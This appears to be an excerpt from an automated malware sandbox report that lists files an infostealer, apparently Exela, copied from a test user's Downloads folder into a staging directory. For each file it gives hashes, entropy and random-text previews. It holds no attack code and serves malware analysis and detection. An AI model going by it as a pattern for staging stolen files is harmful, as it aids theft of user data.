                                                                                                                                                                                                                                                          Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\NIKHQAIQAU.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                                          MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                                          SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                                          SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                                          SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\NWTVCDUMOB.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                                          MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                                          SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                                          SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                                          SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\ONBQCLYSPU.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\ONBQCLYSPU.pdf

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                          MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                          SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                          SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                          SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\UMMBDNEQBN.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\UMMBDNEQBN.png

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\UMMBDNEQBN.xlsx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                          MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                          SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                          SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                          SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\UOOJJOZIRH.mp3

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                                          MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                                          SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                                          SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                                          SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Downloads\VLZDGUKUTZ.docx

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1026
                                                                                                                                                                                                                                                          Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                          MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                          SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                          SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                          SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                          Malicious:false
